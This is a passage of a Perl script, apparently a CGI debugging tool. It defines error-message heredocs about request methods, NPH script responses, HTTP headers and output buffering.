If you specify an encoding type of multipart/form-data in the configuration
file, I will create a random boundary, and set the CONTENT_TYPE to the
following:

    multipart/form-data; boundary=--------------Some Random Boundary

Content_Type

    $ERRORS{'Request_Method'} = <<Request_Method;

The REQUEST_METHOD variable in your data file is not set correctly. It
has to have a value of either GET or POST.

Request_Method

    $ERRORS{'NPH_Script'} = <<NPH_Script;

Your NPH (Non-Parsed-Header) script does not output the correct HTTP
response. The first line has to be something like:

    HTTP/1.0 200 OK

NPH_Script

    $ERRORS{'HTTP_Headers'} = <<HTTP_Headers;

A serious error! Either you are not outputting a **BLANK** line after
the HTTP headers, *OR* you are trying to send invalid (or undefined)
HTTP headers. Please check the output of your script and try again.

HTTP_Headers

    $ERRORS{'Output'} = <<Output;

It looks as though your script has no bugs (atleast, on the surface),
so here is the output you have been waiting for:

Output

    $ERRORS{'System_Command'} = <<System_Command;

The *system* command was detected in your script. Make sure to turn
output buffering off by adding the following line to your script:

    \$| = 1;

System_Command

}


